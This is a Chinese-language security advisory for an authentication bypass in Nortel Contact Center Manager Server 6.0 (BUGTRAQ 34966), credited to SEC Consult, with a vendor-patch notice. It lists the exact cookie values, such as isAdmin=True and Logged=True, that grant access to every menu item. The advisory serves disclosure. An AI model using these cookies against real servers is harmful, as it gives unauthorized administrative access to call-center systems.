受影响系统:
Nortel Networks Contact Center Manager Server 6.0
描述:
BUGTRAQ ID: 34966
Contact Center Manager Server(CCMS)是功能强大的呼叫中心解决方案。
CCMS依赖于客户端Cookie检查已认证用户的角色。如果手动设置了这些Cookie,就可以绕过认证访问CCMS。
可通过设置以下cookie访问所有的菜单项:
LoginMsgSwitch=True
LoginMsgAccepted=True
Logged=True
isAdmin=True
LoginMsgSwitch=True
LoginMsgAccepted=True
IsConfig=1
IsUser=1
IsRTD=1
IsReport=1
IsScript=1
IsAudit=1
IsEmHelp=1
isOutbound=1
UserID=x
AuditSwitch=on
LoginMsgAccepted=True
<*来源:Bernhard Mueller (research@sec-consult.com)
链接:http://marc.info/?l=bugtraq&m=124335502922159&w=2
http://www116.nortel.com/pub/repository/CLARIFY/DOCUMENT/2009/19/024778-01.pdf
*>
建议:
厂商补丁:
Nortel Networks
—————
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
